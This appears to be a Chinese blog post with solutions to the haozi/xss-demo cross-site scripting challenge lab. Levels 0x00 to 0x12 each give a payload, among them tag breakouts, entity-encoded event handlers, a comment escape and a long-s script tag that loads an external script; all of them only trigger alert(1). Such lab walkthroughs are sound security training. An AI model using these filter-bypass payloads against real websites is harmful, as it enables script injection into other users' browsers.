haozi/xss-demo通关

本文列举了多种XSS跨站脚本攻击的实例,包括不同编码方式下的注入尝试,如`<script>`, `onerror`, `img`标签的`onerror`属性等。这些实例展示了攻击者如何利用HTML和JavaScript来执行恶意脚本,提醒读者关注网站安全性,加强输入验证和输出编码,防止XSS攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

​ 

0x00

0x01

0x02

0x03

0x04

0x05

0x06

0x07

0x08

0x09

0x0a

0x0b

0x0c

0x0d

0x0e

0x0f

0x10

0x11

0x12


0x00

<script> alert(1)</script>

0x01

</textarea><script>alert(1)</script>

0x02

"><script>alert(1)</script>

0x03

<script>alert`1`</script>

0x04

<svg><script>alert&#40;1&#41;</script>

0x05

--!><script>alert(1)</script>

0x06

onclick
=alert(1)

0x07

<input type=button onclick="alert(1)"

0x08

</style
>
<script>alert(1)</script>

0x09

https://www.segmentfault.com/" onerror=alert(1)>

0x0a

暂无不借助服务器其它解法

0x0b

<img src=q onerror=&#97;&#108;&#101;&#114;&#116;(1)>

0x0c

<img src=q onerror=&#97;&#108;&#101;&#114;&#116;(1)>

0x0d


alert(1)
-->

0x0e

<ſcript src="https://xss.haozi.me/j.js"></script>

0x0f

');alert('1

0x10

alert('1')

0x11

");alert("1

0x12

\");alert(1)//
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值